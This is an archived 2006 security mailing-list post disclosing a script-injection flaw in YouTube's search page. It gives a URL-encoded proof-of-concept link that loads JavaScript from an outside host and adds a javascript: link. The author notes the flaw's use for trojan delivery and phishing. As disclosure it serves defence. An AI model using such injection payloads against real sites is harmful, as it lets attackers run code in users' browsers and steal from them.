Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [VulnWatch] You tube html/javascript code injection |
|---|---|
| Date: | Thu, 08 Jun 2006 21:46:33 +0200 |
THere exist a lack of checking in the parametrs passed to the search engine as a result it is possible to even change the contents of the page. A successfull exploitation may not only allow to execute js code for instance to download trojans, but it is also possible to use as a phisher attack. Here is an example that illustrates the threat: http://www.youtube.com/results?search=gaki+no+tsuki%20%3Cimg%20src=%22http://www.danad.com.pl/pic/Zwierzeta/Kroliki/krolik%20002.jpg%22%3E%20%20%3Cscript%20src=%22http://michal.mooo.com/biuro/gora.js%22%20type=%22text/javascript%22%20language=%22JavaScript%22%3E%3C/script%3E%20%3Ca%20href=%22javascript:alert('exploited')%22%3EClick%20me%20to%20test%3C/a%3E&search_type=search_videos&search=Search I would like to than my precious Magdalena Pogorzelska for her support. Regards sectroyer(Micha3 Majchrowicz).
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow, eEye Advisories |
|---|---|
| Next by Date: | [Full-disclosure] iDefense Security Advisory 06.13.06: Windows Media Player PNG Chunk Decoding Stack-Based Buffer Overflow, labs-no-reply |
| Previous by Thread: | [Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow, eEye Advisories |
| Next by Thread: | [Full-disclosure] iDefense Security Advisory 06.13.06: Windows Media Player PNG Chunk Decoding Stack-Based Buffer Overflow, labs-no-reply |
| Indexes: | [Date] [Thread] [Top] [All Lists] |